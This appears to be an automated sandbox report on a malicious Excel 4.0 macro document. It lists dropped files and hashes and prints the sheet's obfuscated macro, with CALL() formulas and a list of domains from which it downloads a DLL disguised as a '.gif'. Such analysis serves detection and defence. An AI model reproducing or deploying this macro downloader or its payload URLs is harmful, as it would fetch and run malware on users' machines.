                                                                        SHA-512:AB3C39F0B6A07F798E9546FA882BE0D850F88337DFBFBF7A797A67B43CC1EA8718C842619E4FE169FD3A6FE270C39866F6B4DBB0187612B2840A6474D0E26BB6
                                                                        Malicious:false
                                                                        IE Cache URL:https://ponchokhana.com/cgi-sys/suspendedpage.cgi
                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:downloaded
                                                                        Size (bytes):129731
                                                                        Entropy (8bit):5.747848755116591
                                                                        Encrypted:false
                                                                        SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
                                                                        MD5:9BDF7C3BDB07C77AB4AE0BECC716B6D0
                                                                        SHA1:C5B2ED793BCFE4D96B2CE93B202B2F551AFB8C87
                                                                        SHA-256:4106E859C225B6FED690E1640CC98E4808E1FF7C5CB041C18493996B04805E48
                                                                        SHA-512:117EFAABE33020EE1C14924D1FB19FE57F2DE6E3FEAB007F3B9A117931479585188500D0B50854CD7D2D85003D00AB313BB662D02571BC4C834FAA25E6360216
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        IE Cache URL:https://accesslinksgroup.com/ds/0104.gif
                                                                        C:\Users\user\AppData\Local\Temp\1DCE0000
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):86267
                                                                        Entropy (8bit):7.89687724118678
                                                                        Encrypted:false
                                                                        SSDEEP:1536:BFlnA+3D5XUYz/wBf8orsEwHKynWLmArf7WtfHR1ijrvWf46rtvpnny:BLA+tDzPjEwqtD3Wt51ijKA6rtvpny
                                                                        MD5:59485B13A6C7B5873A40FB2EC45BD39F
                                                                        SHA1:941883BDB59D930E7E3986D058B233C34630A6BF
                                                                        SHA-256:B643678F376F596E7EDA854BF5254525B7049E08D940411366E70F0DC7EE8550
                                                                        SHA-512:964A5FD3D815AAAA9A275EB5F8779EF6A82FD4E0B507C9DBFB392CC1861A2E23FE1CFB7ADE97AF17A98B21E1096D970506DE131612E8043CDE796AB37CD01F13
                                                                        Malicious:false
                                                                        C:\Users\user\AppData\Local\Temp\CabD53B.tmp
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                        Category:dropped
                                                                        Size (bytes):58596
                                                                        Entropy (8bit):7.995478615012125
                                                                        Encrypted:true
                                                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                        MD5:61A03D15CF62612F50B74867090DBE79
                                                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                        Malicious:false
                                                                        C:\Users\user\AppData\Local\Temp\TarD53C.tmp
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):152788
                                                                        Entropy (8bit):6.309740459389463
                                                                        Encrypted:false
                                                                        SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                                        MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                                        SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                                        SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                                        SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                                        Malicious:false
                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 16:55:37 2021, atime=Wed Apr 7 16:55:37 2021, length=8192, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):867
                                                                        Entropy (8bit):4.480171247399955
                                                                        Encrypted:false
                                                                        SSDEEP:12:85Q0XNcLgXg/XAlCPCHaXtB8XzB/oPUsxX+WnicvbVbDtZ3YilMMEpxRljKVTdJU:853NK/XTd6jytYeFDv3q8rNru/
                                                                        MD5:ADAA11F5477E217D89FE1276B7B4DF31
                                                                        SHA1:73C4A6FF57F2AEF1A2829D6C9C5D7B18F1029386
                                                                        SHA-256:F16FD70438671887819B69CC1339ECCA391B78744FB4AA530888C6521912F2B2
                                                                        SHA-512:5A01857EF32BA4DFBDCA84600867709F9287D5C00E9306D62B60A87F3A3A9F8D73E3AE26C7A9112B7693EADDB10B0EECCE18367B8435BE319FA5860AEEE5504F
                                                                        Malicious:false
                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1245492889.LNK
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Apr 7 16:55:37 2021, atime=Wed Apr 7 16:55:38 2021, length=185344, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2118
                                                                        Entropy (8bit):4.535357653734618
                                                                        Encrypted:false
                                                                        SSDEEP:48:8/3/XT0jFa4tRitU8Qh2/3/XT0jFa4tRitU8Q/:8//XojFaSGU8Qh2//XojFaSGU8Q/
                                                                        MD5:47C7590884F78400BB263A71C493D9D8
                                                                        SHA1:90C93F3C61B70B65CB0502E2EF3B996649B16E07
                                                                        SHA-256:EAFAC668BB1A633FE299BDFF5859A9BD5FA5CD0DDEC45C188824EA9A0D77717B
                                                                        SHA-512:BF5BA6DA53AA997F42F801F20A61C3CF069E4C33596353F7E0F650E11C6F3E05DE6901E74EEA53461661F1BE7CAEEB3D4C0737A0697419B6DDB3DC73E2C27890
                                                                        Malicious:false
                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):110
                                                                        Entropy (8bit):4.81906300856618
                                                                        Encrypted:false
                                                                        SSDEEP:3:oyBVomMY9LRMcXf6p5oZELRMcXf6p5omMY9LRMcXf6p5ov:dj6Y9L8SEL86Y9L8y
                                                                        MD5:D2AF0D62D75E6CE864E75765FCF0AA3D
                                                                        SHA1:32AAE53E47D7E027E1240B2C39129F6001D4FAD5
                                                                        SHA-256:8CFA902A46D50CCDBD04EC7C62CCF4D2F5BC05297ADCD89241209C044920FEFA
                                                                        SHA-512:EE8FBA4DE54B84EBDD12ED4ED39A14B9B34BD2BB4C947E6C16E0659DEA7ACDC07BD2E2A252A26A2B994EAD7A8613A71BF584D4DDFD024D3DCF45F4498FBD1D4F
                                                                        Malicious:false
                                                                        Preview: Desktop.LNK=0..[xls]..document-1245492889.LNK=0..document-1245492889.LNK=0..[xls]..document-1245492889.LNK=0..
                                                                        C:\Users\user\Desktop\EDCE0000
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                        Category:dropped
                                                                        Size (bytes):234340
                                                                        Entropy (8bit):5.681180533619061
                                                                        Encrypted:false
                                                                        SSDEEP:3072:CbmxIEudkLee/DPPjwwm+D17+DXPbmxIEudkLeG:/IEudkLee7nvD1qDXIIEudkLeG
                                                                        MD5:EA7F4AD655E501AC7BBCDB3967275D9E
                                                                        SHA1:81829B1A969FB1FCDF97AB3D8DADA9865EB899F3
                                                                        SHA-256:9723784C3A4FD7DDFA5EEE186EFE907C995310121C7BD0CC536F1270970CE824
                                                                        SHA-512:21078C0A632CC732927BE0F2FDD3B3769F23108987C9DBA42B6F45725FB16E0EFBDCCB6F94029964C5AEB7E7E8FE299CAB14B8A7F0F0C8DC24E031C111A26C7A
                                                                        Malicious:false
                                                                        C:\Users\user\fikftkm.thj
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                        Category:dropped
                                                                        Size (bytes):7614
                                                                        Entropy (8bit):5.643196429180972
                                                                        Encrypted:false
                                                                        SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJcf:QJvVGaRF8I80
                                                                        MD5:116091ED739B7E0F1AD7F819560A0602
                                                                        SHA1:C30A527A2A5F25BC1A63359CAD76A8BAB67CB4FB
                                                                        SHA-256:0445F0A98A263C472AE1C8D8E28275AFEA1BDDD7692746AA5286097B311B29B1
                                                                        SHA-512:83F16BCA5EA4062470B8807912F10B6D743C2DEF2261B4E16098EA8FC1DCB6692CBBD4C6870F27408422B75A3CDCD46A3856AB2162177ED2386D4B8188C122E8
                                                                        Malicious:true
                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                        C:\Users\user\fikftkm.thj2
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):129731
                                                                        Entropy (8bit):5.747848755116591
                                                                        Encrypted:false
                                                                        SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
                                                                        MD5:9BDF7C3BDB07C77AB4AE0BECC716B6D0
                                                                        SHA1:C5B2ED793BCFE4D96B2CE93B202B2F551AFB8C87
                                                                        SHA-256:4106E859C225B6FED690E1640CC98E4808E1FF7C5CB041C18493996B04805E48
                                                                        SHA-512:117EFAABE33020EE1C14924D1FB19FE57F2DE6E3FEAB007F3B9A117931479585188500D0B50854CD7D2D85003D00AB313BB662D02571BC4C834FAA25E6360216
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\fikftkm.thj3
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                        Category:dropped
                                                                        Size (bytes):7624
                                                                        Entropy (8bit):5.642596381720329
                                                                        Encrypted:false
                                                                        SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJf0:QJvVGaRF8I80
                                                                        MD5:190F2D4BCDE1E366EAAB903C29C7A699
                                                                        SHA1:346D44A0619C97AA226EF52F146F9A133F4DCAAF
                                                                        SHA-256:20C2D643754869BA5763DDC6289A0FADBBF2DE81236F1F80B7FA3588B14F6EBB
                                                                        SHA-512:AB3C39F0B6A07F798E9546FA882BE0D850F88337DFBFBF7A797A67B43CC1EA8718C842619E4FE169FD3A6FE270C39866F6B4DBB0187612B2840A6474D0E26BB6
                                                                        Malicious:false
                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

                                                                        Static File Info

                                                                        General

                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Apr 1 10:53:30 2021, Security: 0
                                                                        Entropy (8bit):5.512375299027175
                                                                        TrID:
                                                                        • Microsoft Excel sheet (30009/1) 78.94%
                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                        File name:document-1245492889.xls
                                                                        File size:184832
                                                                        MD5:e30c71417d7675c13ca725d3bb4172eb
                                                                        SHA1:80350061fb497c3fc79ac2cd4f8a315aceae412e
                                                                        SHA256:05d2f75e43502476f32925c3f8ca82245c4f5433c4d405779e6fd178cd37ea13
                                                                        SHA512:4f2f96126cc2bde21292a0ac85ffa04799915f57750356bf1957313b7c353efc469172362ba66691b7417553a3e7eca1e14c8ad75462ce524da8041d785aa641
                                                                        SSDEEP:1536:4PrixIEudkLeXf1D5XUY//wBf8orsYwbKynDLmAMo5VjP2/zaUv:4PmxIEudkLeXPD/PjYwe2DMo3S/7
                                                                        File Content Preview:........................>.......................g...........................d...e...f..........................................................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:e4eea286a4b4bcb4

                                                                        Static OLE Info

                                                                        General

                                                                        Document Type:OLE
                                                                        Number of OLE Files:1

                                                                        OLE File "document-1245492889.xls"

                                                                        Indicators

                                                                        Has Summary Info:True
                                                                        Application Name:Microsoft Excel
                                                                        Encrypted Document:False
                                                                        Contains Word Document Stream:False
                                                                        Contains Workbook/Book Stream:True
                                                                        Contains PowerPoint Document Stream:False
                                                                        Contains Visio Document Stream:False
                                                                        Contains ObjectPool Stream:
                                                                        Flash Objects Count:
                                                                        Contains VBA Macros:True

                                                                        Summary

                                                                        Code Page:1251
                                                                        Author:
                                                                        Last Saved By:
                                                                        Create Time:2006-09-16 00:00:00
                                                                        Last Saved Time:2021-04-01 09:53:30
                                                                        Creating Application:Microsoft Excel
                                                                        Security:0

                                                                        Document Summary

                                                                        Document Code Page:1251
                                                                        Thumbnail Scaling Desired:False
                                                                        Contains Dirty Links:False
                                                                        Shared Document:False
                                                                        Changed Hyperlinks:False
                                                                        Application Version:1048576

                                                                        Streams

                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                        General
                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                        File Type:data
                                                                        Stream Size:4096
                                                                        Entropy:0.354263933307
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 3 . . . . . D o c 1 . . . . . D o c 2 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . .
                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b0 00 00 00 02 00 00 00 e3 04 00 00
                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                        General
                                                                        Stream Path:\x5SummaryInformation
                                                                        File Type:data
                                                                        Stream Size:4096
                                                                        Entropy:0.251653152424
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 173850
                                                                        General
                                                                        Stream Path:Workbook
                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                        Stream Size:173850
                                                                        Entropy:5.72116035247
                                                                        Base64 Encoded:True
                                                                        Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 ! . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                                                                        Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 04 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                        Macro 4.0 Code

                                                                        ,,,,,,,,,,,,,,,,,,,,=CHAR(85),,,,=CHAR(74),,=CHAR(114),,=CHAR(44),,,,,,=CHAR(82),,,,=CHAR(74),,=CHAR(117),,=CHAR(68),,,,,,=CHAR(76),,,,=CHAR(67),,=CHAR(110),,=CHAR(108),,,,,,=CHAR(77),,,,=CHAR(67),,=CHAR(100),,=CHAR(108)"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)",,,,,,=CHAR(111),,,,=CHAR(66),,=CHAR(108),,=CHAR(82),,,,,,=CHAR(110),,,,=CHAR(66),,=CHAR(108),,=CHAR(101),,,,,,,,,,,,=CHAR(51),,=CHAR(103),,,,,,,,,,,,,,=CHAR(105),,,,,,,,,,,,,,=CHAR(115),,,,,,,,,,,,,,=CHAR(116)"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ROMAN(7.85678564725478E+27,423)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=LOG(742343642785237000000,4235327)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=ODD(7
.42425845234725E+25)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=CALL(""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A200&Doc1!C200,Doc1!E201,0,0)",,,,,,,,,,,,,,=CHAR(101)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A201&Doc1!C201,Doc1!E201&""1"",0,0)",,,,,,,,,,,,,,=CHAR(114)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A202&Doc1!C202,Doc1!E201&""2"",0,0)",,,,,,=CHAR(40+45),,,,,,,,=CHAR(83)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A203&Doc1!C203,Doc1!E201&""3"",0,0)",,,,,,=CHAR(22+60),,,,,,,,=CHAR(101)"=CALL(BY2&BY3&BY4&BY5&BY6&BY7,BY14&BY15&BY16&Doc3!AL5&Doc3!AL6&Doc3!AL7&Doc3!AL8&Doc3!AL9&Doc3!AL10&Doc3!AL11&Doc3!AL12&Doc3!AL13&Doc3!AL14&Doc3!AL15&Doc3!AL16&Doc3!AL17&Doc3!AL18&Doc1!J207,CC2&CC3&CC4&CC5&CC6&CC7,0,before.3.0.70.sheet!BU32&Doc3!A100&Doc1!A204&Doc1!C204,Doc1!E201&""4"",0,0)",,,,,,=CHAR(6+70),,,,,,,,=CHAR(114)=Doc1!H206(),,,,,,,,,,,,,,=CHAR(118),,,,,,,,,,,,,,=CHAR(101),,,,,,,,,,,,,,=CHAR(114),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,=HALT(),,,,,,,,,,,,,,,,h,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                        ,,,,,,,,,vts.us.com/ds/0104.,,gif,,,,,,,mundotecnologiasolar.com/ds/0104.,,gif,,..\fikftkm.thj,,,,,accesslinksgroup.com/ds/0104.,,gif,,,,,,,ponchokhana.com/ds/0104.,,gif,,,,,,,comosairdoburaco.com.br/ds/0104.,,gif,,,,,,,,,,,,,,,,,,,,,,,"=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE
